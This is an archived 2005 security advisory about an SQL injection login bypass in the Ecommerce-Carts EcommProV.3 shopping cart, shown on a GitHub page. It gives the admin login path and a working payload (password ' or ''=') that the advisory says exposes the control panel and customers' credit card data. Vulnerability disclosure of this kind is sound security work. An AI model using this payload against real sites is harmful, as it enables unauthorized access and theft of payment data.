forked from hackernix/PacketStorm-Exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathecomSQL.txt
More file actions
executable file
·45 lines (33 loc) · 1.33 KB
/
Copy pathecomSQL.txt
File metadata and controls
executable file
·45 lines (33 loc) · 1.33 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
********************************************
IHS Iran Hackers Sabotage Public advisory
by : c0d3r "Kaveh Razavi" c0d3r@ihsteam.com
********************************************
----------------------------------------------------------
advisory url :
http://www.ihssecurity.com/cms/modules/mydownloads/visit.php?lid=8
application : Ecommerce-Carts EcommProV.3 and prior
vender : Ecommerce-Carts.com
risk : critical
Ecommerce-Carts is a web application that is used to manage small
businesses .
it has got many useful features like credit card process and etc .
Ecommerce-Carts contain a very dangrous sql injection which allow attacker
to gain access to
control panel page and view critical information like credit card
information and so on .
the vulnerability is quite simple to use :
http://site.com/scart/admin/login.asp
user : admin ( everything )
pass : ' or ''='
----------------------------------------------------------
Disclosure timeline :
14 April 2005 : vender contacted via a private mail
16 April 2005 : vender contacted again ( no response )
19 April 2005 : still no response , public disclosure
----------------------------------------------------------
greeting to IHSteam.com members and exploitdev mates and all Iranian
Security Teams
c0d3r of IHS
Security researcher
Www.ihssecurity.com (english)
www.ihsteam.com (persian)